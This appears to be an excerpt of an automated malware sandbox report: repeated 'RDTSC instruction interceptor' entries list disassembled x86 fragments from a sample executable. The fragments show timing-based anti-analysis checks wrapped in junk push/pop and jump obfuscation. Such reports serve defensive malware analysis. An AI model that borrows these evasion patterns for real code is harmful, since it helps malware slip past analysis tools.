Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: D5183A second address: D51842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: D51842 second address: D51848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: D52EF1 second address: D52EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5FC0CE52C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: D52EFB second address: D52EFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D52EFF second address: D52F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FC0CE52CAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D553FA second address: D55413 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F5FC0E77A13h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D61B4E second address: D61B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D61B52 second address: D61B66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D61B66 second address: D61B7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0CE52CEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D61B7A second address: D61B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D61B7E second address: D61BAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5FC0CE52D7h 0x00000010 jp 00007F5FC0CE52C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D6167E second address: D6168D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F5FC0E77A06h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D6168D second address: D616B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D6h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F5FC0CE52C6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D64C8A second address: D64C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D64AE3 second address: D64AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5FC0CE52C6h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D64AEE second address: D64AF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D64AF3 second address: D64AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D64AFB second address: D64B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D64B07 second address: D64B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FC0CE52D2h 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D64B1E second address: D64B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D64B24 second address: D64B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: D64B28 second address: D64B44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A11h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E30C05 second address: E30C0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F5FC0CE52C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FA7B second address: E2FA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FA83 second address: E2FA92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FC0CE52CAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FA92 second address: E2FA9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F5FC0E77A06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FC05 second address: E2FC2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FC0CE52D0h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5FC0CE52D0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FC2B second address: E2FC33 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FC33 second address: E2FC42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0CE52CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FC42 second address: E2FC46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FDA1 second address: E2FDA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FDA7 second address: E2FDAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FDAC second address: E2FDB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FDB2 second address: E2FDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E2FF26 second address: E2FF36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E3037E second address: E3039D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5FC0E77A06h 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5FC0E77A0Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E3039D second address: E303A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E303A1 second address: E303AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5FC0E77A06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E303AD second address: E303B2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E3053C second address: E30540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E30540 second address: E30546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E30546 second address: E30551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F5FC0E77A06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E307E3 second address: E307ED instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5FC0CE52C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C26E56 second address: C26E66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: C26E66 second address: C26E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E3631C second address: E36320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E3637F second address: E36383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E36383 second address: E363B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+1244D24Dh], esi 0x00000014 push 00000004h 0x00000016 mov dx, 191Eh 0x0000001a push 985D6936h 0x0000001f push eax 0x00000020 push edx 0x00000021 jnc 00007F5FC0E77A0Ch 0x00000027 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E365E9 second address: E365F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E365F0 second address: E365F5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: E39873 second address: E39894 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5FC0CE52C6h 0x00000008 jnc 00007F5FC0CE52C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jne 00007F5FC0CE52D1h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050096 second address: 705009C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705009C second address: 70500B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 18h 0x0000000e pushad 0x0000000f mov cl, 49h 0x00000011 push eax 0x00000012 push edx 0x00000013 mov ax, dx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705019F second address: 70501B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0E77A0Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70501B1 second address: 70501B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70501B5 second address: 70501E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [759B06ECh] 0x0000000e jmp 00007F5FC0E77A17h 0x00000013 test esi, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70501E2 second address: 70501E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70501E8 second address: 7050247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5FC0E77A18h 0x00000008 pop esi 0x00000009 mov dh, 5Ch 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007F5FC0E78A31h 0x00000014 pushad 0x00000015 push ecx 0x00000016 movsx edx, cx 0x00000019 pop esi 0x0000001a jmp 00007F5FC0E77A11h 0x0000001f popad 0x00000020 xchg eax, edi 0x00000021 jmp 00007F5FC0E77A0Eh 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F5FC0E77A0Eh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050247 second address: 705028C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F5FC0CE52D6h 0x0000000f call dword ptr [75980B60h] 0x00000015 mov eax, 75F3E5E0h 0x0000001a ret 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F5FC0CE52D7h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705028C second address: 70502F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000044h 0x0000000b jmp 00007F5FC0E77A0Eh 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov edi, 780C66F0h 0x00000019 pushfd 0x0000001a jmp 00007F5FC0E77A19h 0x0000001f and eax, 28FF1476h 0x00000025 jmp 00007F5FC0E77A11h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70502F5 second address: 705031A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5FC0CE52CDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705031A second address: 705034B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 0362A799h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov ecx, edx 0x0000000f jmp 00007F5FC0E77A11h 0x00000014 popad 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5FC0E77A0Dh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705034B second address: 70503B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5FC0CE52D7h 0x00000008 pop ecx 0x00000009 movsx edi, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push dword ptr [eax] 0x00000011 pushad 0x00000012 mov cx, 8ACDh 0x00000016 pushfd 0x00000017 jmp 00007F5FC0CE52CAh 0x0000001c jmp 00007F5FC0CE52D5h 0x00000021 popfd 0x00000022 popad 0x00000023 mov eax, dword ptr fs:[00000030h] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F5FC0CE52D8h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70503B7 second address: 70503BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70503BB second address: 70503C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70503C1 second address: 70503C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70503C7 second address: 70503CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70503CB second address: 70503CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050402 second address: 7050406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050406 second address: 705040A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705040A second address: 7050410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050410 second address: 7050416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050416 second address: 7050446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b mov si, F06Fh 0x0000000f mov si, 248Bh 0x00000013 popad 0x00000014 je 00007F602F5C4544h 0x0000001a jmp 00007F5FC0CE52CEh 0x0000001f sub eax, eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050446 second address: 705044A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705044A second address: 705044E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705044E second address: 7050454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050454 second address: 705048B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b pushad 0x0000000c mov cx, 7DD3h 0x00000010 movzx ecx, di 0x00000013 popad 0x00000014 mov dword ptr [esi+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5FC0CE52CEh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705048B second address: 7050491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050491 second address: 7050495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050495 second address: 705052B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b pushad 0x0000000c mov esi, edi 0x0000000e call 00007F5FC0E77A0Bh 0x00000013 mov bh, ah 0x00000015 pop ebx 0x00000016 popad 0x00000017 mov dword ptr [esi+0Ch], eax 0x0000001a pushad 0x0000001b mov dx, cx 0x0000001e pushad 0x0000001f call 00007F5FC0E77A18h 0x00000024 pop ecx 0x00000025 mov dh, F6h 0x00000027 popad 0x00000028 popad 0x00000029 mov eax, dword ptr [ebx+4Ch] 0x0000002c pushad 0x0000002d jmp 00007F5FC0E77A18h 0x00000032 call 00007F5FC0E77A12h 0x00000037 mov eax, 6FB8B2C1h 0x0000003c pop ecx 0x0000003d popad 0x0000003e mov dword ptr [esi+10h], eax 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 jmp 00007F5FC0E77A16h 0x00000049 push esi 0x0000004a pop ebx 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705052B second address: 705058A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+50h] 0x0000000c pushad 0x0000000d movzx eax, bx 0x00000010 pushfd 0x00000011 jmp 00007F5FC0CE52D1h 0x00000016 sbb eax, 3E2A9BD6h 0x0000001c jmp 00007F5FC0CE52D1h 0x00000021 popfd 0x00000022 popad 0x00000023 mov dword ptr [esi+14h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F5FC0CE52CDh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705058A second address: 705058F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 705058F second address: 70505CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F5FC0CE52CDh 0x0000000a jmp 00007F5FC0CE52CBh 0x0000000f popfd 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov eax, dword ptr [ebx+54h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5FC0CE52D5h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70505CA second address: 7050626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5FC0E77A17h 0x00000009 or ecx, 56AAA7CEh 0x0000000f jmp 00007F5FC0E77A19h 0x00000014 popfd 0x00000015 movzx eax, bx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esi+18h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F5FC0E77A16h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 7050626 second address: 70506B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+58h] 0x0000000c pushad 0x0000000d jmp 00007F5FC0CE52D4h 0x00000012 pushfd 0x00000013 jmp 00007F5FC0CE52D2h 0x00000018 sub si, 1D08h 0x0000001d jmp 00007F5FC0CE52CBh 0x00000022 popfd 0x00000023 popad 0x00000024 mov dword ptr [esi+1Ch], eax 0x00000027 pushad 0x00000028 push edi 0x00000029 mov esi, 2E54DC4Dh 0x0000002e pop ecx 0x0000002f popad 0x00000030 mov eax, dword ptr [ebx+5Ch] 0x00000033 pushad 0x00000034 jmp 00007F5FC0CE52CFh 0x00000039 push esi 0x0000003a mov bl, 94h 0x0000003c pop esi 0x0000003d popad 0x0000003e mov dword ptr [esi+20h], eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F5FC0CE52D9h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exeRDTSC instruction interceptor: First address: 70506B6 second address: 70506CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
